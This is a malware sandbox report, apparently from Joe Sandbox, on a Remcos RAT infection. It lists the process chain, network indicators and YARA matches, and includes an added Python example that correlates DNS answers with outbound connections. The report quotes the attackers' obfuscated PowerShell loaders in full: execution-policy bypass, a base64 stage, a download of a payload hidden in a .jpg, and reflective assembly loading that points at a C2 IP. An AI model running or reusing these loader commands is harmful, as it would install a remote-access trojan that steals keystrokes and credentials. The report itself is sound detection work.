Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: RegAsm.exe, 0000000C.00000002.2251250013.0000000000BF4000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.00000000051F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2119899349.00000000056A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004D36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauthp
Source: RegAsm.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: RegAsm.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49707 version: TLS 1.2
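The "TCP traffic detected without corresponding DNS query" entries above, the C2 name idabo.duckdns.org resolving to 135.148.195.248:6875, and the geoplugin.net lookup all fall out of one correlation: joining every outbound connection against the DNS answers the host received shortly before it. The Python below is an added example written for this page, not Joe Sandbox or Suricata code; its DNS and connection records are constructed from the addresses, names and ports listed above (timestamps invented), the dynamic-DNS suffix list is an assumed watchlist, and the function names are the example's own.

```python
"""Correlate DNS answers with outbound connections: the check behind this
report's 'TCP traffic detected without corresponding DNS query' entries and
its Remcos C2 findings. Added example for this page, not Joe Sandbox or
Suricata code. Records are constructed from the report's addresses, names
and ports; the timestamps are invented seconds."""

# (ts, queried name, answer IP): the shape Zeek dns.log or Sysmon Event ID 22 gives you
DNS_ANSWERS = [
    (1.0, "raw.githubusercontent.com", "185.199.111.133"),
    (9.0, "idabo.duckdns.org", "135.148.195.248"),
    (12.0, "geoplugin.net", "178.237.33.50"),
]
# (ts, source IP, destination IP, destination port): Zeek conn.log / Sysmon Event ID 3 / firewall
CONNECTIONS = [
    (2.0, "192.168.2.5", "185.199.111.133", 443),    # stage that fetches DetahNote_V.jpg
    (3.0, "192.168.2.5", "192.3.220.40", 80),        # literal-IP URL, no DNS ever issued
    (4.0, "192.168.2.5", "192.3.220.40", 80),
    (10.0, "192.168.2.5", "135.148.195.248", 6875),  # Remcos C2 behind a duckdns.org name
    (13.0, "192.168.2.5", "178.237.33.50", 80),      # geoplugin.net geolocation of the victim
]
DDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")  # assumed watchlist; extend locally
COMMON_PORTS = {53, 80, 443}


def names_for(dns_answers, ip, at_ts, window=300.0):
    """Names that resolved to `ip` within `window` seconds before a connection at `at_ts`."""
    return sorted({name for ts, name, answer in dns_answers
                   if answer == ip and at_ts - window <= ts <= at_ts})


def triage_connections(dns_answers, connections, window=300.0):
    """One finding per connection: the names that explain it and the reasons it stands out."""
    findings = []
    for ts, src, dst, port in connections:
        names = names_for(dns_answers, dst, ts, window)
        reasons = []
        if not names:
            reasons.append("no_dns")         # the host never asked for this address by name
        if any(n.endswith(DDNS_SUFFIXES) for n in names):
            reasons.append("dynamic_dns")    # free dynamic-DNS name fronting the server
        if port not in COMMON_PORTS:
            reasons.append("uncommon_port")  # 6875/tcp in this report
        findings.append({"ts": ts, "src": src, "dst": dst, "port": port,
                         "names": names, "reasons": reasons})
    return findings


def summarize(findings):
    """One row per destination, so 50 connections to one IP become one line with a count."""
    rows = {}
    for f in findings:
        row = rows.setdefault(f["dst"], {"connections": 0, "ports": set(), "names": set(), "reasons": set()})
        row["connections"] += 1
        row["ports"].add(f["port"])
        row["names"].update(f["names"])
        row["reasons"].update(f["reasons"])
    return {dst: {"connections": r["connections"], "ports": sorted(r["ports"]),
                  "names": sorted(r["names"]), "reasons": sorted(r["reasons"])}
            for dst, r in rows.items()}


if __name__ == "__main__":
    for dst, row in summarize(triage_connections(DNS_ANSWERS, CONNECTIONS)).items():
        print(dst, row)
```

A connection with no name behind it is a hunting signal, not an alert on its own: resolver caches, another host on the segment doing the lookup, and reused keep-alive sockets all produce it legitimately, which is why the window is a parameter and why a DNS answer that arrives after the connection does not count. What makes 192.3.220.40 worth pulling here is the combination: no name at any point, 50 connections, and a URL the PowerShell stage assembles from a reversed string.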

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041CA73 SystemParametersInfoW

                      System Summary

                      barindex
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'[...]'+[ChAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[...]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 3840, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = 
[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00401806 NtdllDefWindowProc_W
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004018C0 NtdllDefWindowProc_W
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004016FD NtdllDefWindowProc_A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004017B7 NtdllDefWindowProc_A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00402CAC NtdllDefWindowProc_A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00402D66 NtdllDefWindowProc_A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_029FAC24
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043706A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00414005
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043E11C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004541D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004381E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041F18B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00446270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043E34B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004533AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0042742E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00437566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043E5A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004387F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043797E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004339D7
